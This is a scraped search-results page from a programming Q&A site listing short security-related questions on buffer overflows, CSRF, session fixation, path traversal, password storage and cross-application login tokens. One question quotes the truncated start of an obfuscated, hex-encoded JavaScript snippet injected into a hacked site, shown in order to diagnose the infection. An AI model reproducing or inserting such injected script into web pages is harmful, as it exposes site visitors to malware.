Where can I find a demonstration of a buffer overflow?
- by boost
Is there a site, or is there a simple way of setting up one, which demonstrates what can happen with a buffer overrun? This is in the context of a web app.
Search Results
Search found 13222 results on 529 pages for 'security gate'.
Page 174/529 | < Previous Page | 170 171 172 173 174 175 176 177 178 179 180 181 | Next Page >
-
-
Developing licenses in C# - where do I start?
- by vikp
Hi, I'm interested to find out whether there are any standards or resources that you can recommend for developing license models in C#? Thank youRead the article
-
Is it possible for users/bots to spam executions of mp3s and waste bandwidth?
- by Scarface
Hey guys, I currently present my mp3s by referencing their file location into a flash mp3 player for the users. Is is possible for users/bots to go onto your site and somehow execute an mp3 continuously and drain bandwidth? If so how can you prevent this? (I program in php). Thanks in advance for any advice.Read the article
-
System("pause"); - Why is it wrong?
- by Faken
Here's a question that I don't quite understand: The command, System("pause"); is taught to new programmers as a way to pause a program and wait for a keyboard input to continue. However, it seems to be frowned on by many veteran programmers as something that should not be done in varying degrees. Some people say it is fine to use. Some say it is only to be used when you are locked in your room and no one is watching. Some say that they will personally come to your house and kill you if you use it. I, myself am a new programmer with no formal programming training. I use it because I was taught to use it. What I don't understand is that if it is not something to be used, then why was I taught to use it? Or, on the flip side, is it really not that bad after all? What are your thoughts on this subject?Read the article
-
Cookieless Django for government site
- by phoebebright
As I'm writing a django site from government bodies I'm not going to be able to use cookies. I found this snippet http://djangosnippets.org/snippets/1540/ but it's currently not allowing users to login. Before I start debugging I wondered if anyone else has solved this problem with this snippet or in any other way?Read the article
-
POST to webpage in vb.net (win forms, desktop, not ASP.net)
- by Jonathan
I have various php files which data is Posted to (like the password when the user signs in) How can I can I post to these php from vb.net (a desktop application that is Windows Forms, this is not about ASP.net) thanksRead the article
-
How to protect access to a url?
- by ibiza
I would need to create a php file that will do some work on my webserver and that will be called from a program on another server over the internet. Suppose the php file that will do the work is located at www.example.com/work.php What is the best way to protect unsollicited calls to the www.example.com/work.php? What I need is some mechanism so that when the intended program accesses the url (with some query string parameters), the work gets done, but if somebody type www.example.com/work.php in their browser, access will be denied and no work will be done. The way I've thought is to add some 'token' in the querystring that would be constructed by some algorithm from the calling program, a sample result could be to append to the url : ?key=randomKeyAtEachCall&token=SomeHexadecimalResultCalculatedFromTheKey and the key and token would be validated with a reverse algorithm on the php side. Is that safe, Are there any better idea?Read the article
-
How do open source companies avoid harmful contributions and find the useful ones?
- by hory.incpp
Because wikipedia is open source, I can modify anything I want. But what happens if someone deletes, adds bad content, modifies useful content ? What does wikipedia do to prevent that ? The last question is available for any other open source software: linux, php etc. How do they know which contribution is useful and which is harmful ? Thank you.Read the article
-
aspnet_regsql questions and users and role
- by Alexander
I spend quite some hours banging my head against the wall trying to set up the aspnet membership / roles tables in my SQL server database instead of having them exist inside the App_Code/ASPNETDB.MDF file because that file wasn't working correctly on my host. I eventually figured out the problem by following Scott's gu here and was able to resolve it by running the aspnet_regsql.exe utility and creating a connection string for LocalSqlServer. The ridiculous part about it is that after running the aspnet_regsql and upload my database to my webhost all of my users and role that I have already created is gone. The user, membership, role, etc is gone. I can't populate this using the Web Site Administration Tool as it's not visual studio now. So what is the easiest way to populate the user, role, etc to my SQL Server as I now have dbo.aspnet_Application, dbo.aspnet_Paths, dbo.aspnet_Roles, etc...etc...Read the article
-
Wordpress vulnerabilities test scanner
- by systempuntoout
Do you know any stand-alone client or web tool (like grc) that could scan, find and report Wordpress vulnerabilities, plugins included?Read the article
-
REST authentication S3 like hmac sha1 signature vs symetric data encryption.
- by coulix
Hello stackers, I was arguing about an S3 like aproach using authorization hash with a secret key as the seed and some data on the request as the message signed with hmac sha1 (Amazon S3 way) vs an other developer supporting symetric encryption of the data with a secret key known by the emiter and the server. What are the advantage of using signed data with hmac sha1 vs symetric key other than the fact that with the former, we do not need to encrypt the username or password. What would be the hardest to break ? symetric encryption or sha1 hashing at la S3 ? If all big players are using oauth and similar without symetric key it is sure that there are obvious advantages, what are those ?Read the article
-
USB token with certificate
- by Frengo
Hi all! Someone could explain me how the USB token works? I have to implement that secure layer in a java application, but i don't know very well how it works! I know only the mecanism of a normal token key generator! Thanks a lot!Read the article
-
Prevent access to files outside a certain directory in PHP
- by James L
I've found out the hard way that my website can be hacked by passing a query string parameter that has many ../s to access files outside of the website directory, and then screw with the website. Is there a way, perhaps through the php.ini, to not allow file includes outside of a certain root directory?Read the article
-
Chunks of javascript added to webpages on server
- by SteD
I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.Read the article
-
Secured applications
- by mehdi
How can we make our applications secured up to 100%?Read the article
-
What is the best practice for secure connection to SQL Server 2008 from .net 4.0?
- by Joe
What is the best practice and most secure solution when connecting from a .NET 4.0 application to SQL Server in 2008?Read the article
-
PHP 2-way encryption: I need to store passwords that can be retrieved
- by gAMBOOKa
I am creating an application that will store passwords, which the user can retrieve and see. The passwords are for a hardware device, so checking against hashes are out of the question. What I need to know is: How do I encrypt and decrypt a password in PHP? What is the safest algorithm to encrypt the passwords with? Where do I store the private key? Instead of storing the private key, is it a good idea to require users to enter the private key any time they need a password decrypted? (Users of this application can be trusted) In what ways can the password be stolen and decrypted? What do I need to be aware of?Read the article
-
PAC with kerberoes
- by Varun
I am currently working on kerberoes, and for now have this doubt on PAC in MS-KILE kerberoes extension. Can pac included in pactype strcuture withtin authorization data, is meant for client to decrypt and decode. It seems (if my understanding is correct), that PAC is encrypted with target server's encryption key, which is known only to kdc and target server, and therefore, client just needs to forward that to server when requesting a service, and isn't suppose to decrypt and extract details about its credentails. Is there a way to try to decrypt this on the fly? ( is there sufficient information available in AS-REP for me extract and decrypt this?Read the article
-
Can a program assign the memory directly?
- by Tattat
Is there any really low level programming language that can get access the memory variable directly? For example, if I have a program have a variable i. Can anyone access the memory to change my program variable i to another value?Read the article
-
Cross-Application User Authentication
- by Chris Lieb
We have a webapp written in .NET that uses NTLM for SSO. We are writing a new webapp in Java that will tightly integrate with the original application. Unfortunately, Java has no support for performing the server portion of NTLM authentication and the only library that I can find requires too much setup to be allowed by IT. To work around this, I came up with a remote authentication scheme to work across applications and would like your opinions on it. It does not need to be extremely secure, but at the same time not easily be broken. User is authenticated into .NET application using NTLM User clicks link that leaves .NET application .NET application generates random number and stores it in the user table along with the user's full username (domain\username) Insecure token is formed as random number:username Insecure token is run through secure cipher (likely AES-256) using pre-shared key stored within the application to produce a secure token The secure token is passed as part of the query string to the Java application The Java application decrypts the secure key using the same pre-shared key stored within its own code to get the insecure token The random number and username are split apart The username is used to retrieve the user's information from the user table and the stored random number is checked against the one pulled from the insecure token If the numbers match, the username is put into the session for the user and they are now authenticated If the numbers do not match, the user is redirected to the .NET application's home page The random number is removed from the databaseRead the article
-
Resolving Session Fixation in JBoss
- by Warren Blanchet
I need to prevent Session Fixation, a particular type of session hijacking, in a Java web application running in JBoss. However, it appears that the standard idiom doesn't work in JBoss. Can this be worked around?Read the article
-
What's the state of support for SHA-2 in various platforms?
- by Cheeso
I read that SHA-1 is being retired from the FIPS 180-2 standard. Apparently there are weaknesses in SHA-1 that led to this decision. Can anyone elaborate on the basis for that decision? Are there implications for the use of SHA-1 in commercial applications? My real questions are: What is the state of SHA-2 support in various class libraries and platforms? Should I attempt to move to SHA-2? Interested in mainstream platforms: .NET, Java, C/C++, Python, Javascript, etc.Read the article
-
Why can CSRF attack be prevented by a random CSRF secret?
- by user261527
to prevent CSRF attacks, a random CSRF secret has been generated. The above is from symfony: http://www.symfony-project.org/getting-started/1_4/en/04-Project-Setup Since it's finally operated by users,which is so called deputy attack.how can it work by setting that secret?Read the article
-
Persisting sensitve data in asp.net, odd implementation
- by rawsonstreet
For reasons not in scope of this question I have implemented a .net project in an iframe which runs from a classic asp page. The classic asp site persisted a few sensitive values by hitting the db on each page. I have passed there variables as xml to the aspx page, now I need to make these values available on any page of this .net site. I've looked into the cache object but we are on a web farm so I am not sure it would work. Is there a way I can can instantiate an object in a base page class and have other pages inherit from the base page to access these values? What is the best way to persist these values? A few more points to consider the site runs in https mode and I cannot use session variables, and I would like to avoid cookies if possible..Read the article
-
Claims-based Authentication: Are strings the essence of claims?
- by Rising Star
I've been programming with claims-based authentication for some time now with Windows Identity Foundation. It appears to me that in Windows Identity Foundation, once a user is logged in, the claims are basically strings of information that describe the user. With the old role-based authentication, I could say that a user is or is not a member of a given group, but with claims-based authentication, I can now have strings of information that describe a user. "This user is female". This user was born on "July 6, 1975". "This user logged in using a USB key". Is it the essence of claims-based authentication,that I have strings of information about the user given to the application by the framework?Read the article
